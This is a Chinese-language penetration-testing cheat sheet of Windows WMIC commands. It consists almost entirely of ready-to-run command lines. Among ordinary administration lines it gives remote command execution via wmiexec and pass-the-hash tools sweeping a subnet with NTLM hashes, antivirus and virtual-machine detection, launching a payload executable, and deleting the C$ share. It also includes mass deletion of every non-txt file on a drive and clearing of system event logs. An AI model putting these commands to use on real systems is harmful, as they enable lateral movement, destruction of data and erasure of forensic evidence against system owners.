wmi
wmic是windows自带的命令,其功能十分强大,在渗透渗透中可以起到很好的辅助作用
wmic远程命令执行
命令行(无回显)
wmic /node:ip /user:username /password:password process call "cmd.exe /c ipconfig >> ipconfig.txt"
采用wmiexec.vbs远程执行命令
cscript //nologo wmiexec.vbs /cmd ip username password "ipconfig"
cscript //nologo wmiexec.vbs /shell ip username password
采用Invoke-WMIExec.ps1远程执行命令
Invoke-WMIExec -Target ip -Username username[@domain.com] -Hash
ntlm_hash -Command "ipconfig" -verbose
使用Invoke-TheHash
Invoke-TheHash -Type WMIExec -Targets 192.168.1.0/24 -TargetsExclude 192.168.1.50 -Username
username -Hash ntlm_hash [-Command "ipconfig"]
采用WMIcmd.exe执行命令
WMIcmd.exe -h host -u username -p password -c "ipconfig"
wmic信息收集
获取用户名和域
wmic computersystem get domain,username
查询用户登录信息
查询远程连接
查询时区
查询启动程序
查询域信息
查询补丁信息
查询共享资源
wmic share list brief
wmic share where name="C$" call delete
查询网卡信息
查询驱动程序信息
wmic sysdriver list brief
查询CPU信息
查询操作系统信息
wmic os list brief
wmic os get Caption,Version,BuildNumber,OSArchitecture,CSName,RegisteredUser
查询杀毒软件信息
wmic /namespace:\\root\securitycenter2 path antivirusproduct GET displayName,productState, pathToSignedProductExe
判断是否为虚拟机
wmic onboarddevice get Desciption, DeviceType, Enabled, Status /format:list
用户账户管理
查询用户账户信息
wmic useraccount list brief
wmic useraccount where name="Administrator"
用户名重命名
wmic useraccount where name="%UserName%" rename newUserName
账户名重命名
wmic useraccount where name="Administrator" set fullname newFullName
锁定指定账户
wmic useraccount where name="user_name" set disabled=true
禁止用户修改密码
wmic useraccount where name="user_name" set passwordchangeable=false
进程管理
查看进程信息
创建进程
wmic process call create "shutdown.exe"
wmic process call create "payload.exe"
停止指定进程
wmic process where name="xxx.exe" call terminate
wmic process where pid="123" call terminate
wmic process where name="xxx.exe" delete
wmic process where pid="123" delete
服务管理
查看服务信息
wmic service list brief
wmic service where name="service_name"
wmic service where (status="running") get caption,name,startmode
启动指定服务
wmic service where name="service_name" call startservice
暂停指定服务
wmic service where name="service_name" call pauseservice
停止指定服务
wmic service where name="service_name" call terminate
删除指定服务
wmic service where name="service_name" delete
修改服务启动模式
wmic service where name="service_name" set startmode="auto"
文件管理
查询指定文件的信息
wmic datafile where name="C:\\Users\\%USERNAME%\\Desktop\\1.txt" get /format:list
查找文件
指定磁盘+指定文件名+指定文件后缀
wmic datafile where "drive='c:' and filename='123' and extension='txt'" get name
指定磁盘+模糊文件名+模糊文件路径+指定文件后缀
wmic datafile where "drive='c:' and filename like '%file_name%' and path like '%test%' and extension='txt'" get name
删除文件
wmic datafile where "drive='c:' and filename='test' extension='txt'" call delete
wmic datafile where "drive='c:' and extension<>'txt'" call delete
wmic datafile where "drive='c:' and extension<>'txt' path='test'" call delete
拷贝文件
wmic datafile where "drive='c:' and path='test' and FileName='cc' and Extension='txt'" call copy "E:\cc.txt"
文件重命名(文件移动)
wmic datafile "C:\\123.txt" call rename "C:\\test\\test.txt"
文件夹管理
查找文件夹
wmic fsdir where "drive='c:' filename='test'"
删除文件夹
wmic fsdir where "drive='c:' filename like 'test'" call delete
wmic fsdir "C:\\test" call delete
文件夹重命名
wmic fsdir "C:\\test" rename "C:\\test2"
日志清除
wmic nteventlog where filename="log_name" cleareventlog
wmic nteventlog where filename="system" cleareventlog
远程桌面
打开远程桌面
wmic rdtoggle where servername="%computername%" call SetAllowTSConnections 1
关闭远程桌面
wmic rdtoggle where servername="%computername%" call SetAllowTSConnections 0
软件管理
获取软件列表
卸载软件
wmic product where name="xxx" call uninstall
重新安装软件
wmic product where name="xxx" call reinstall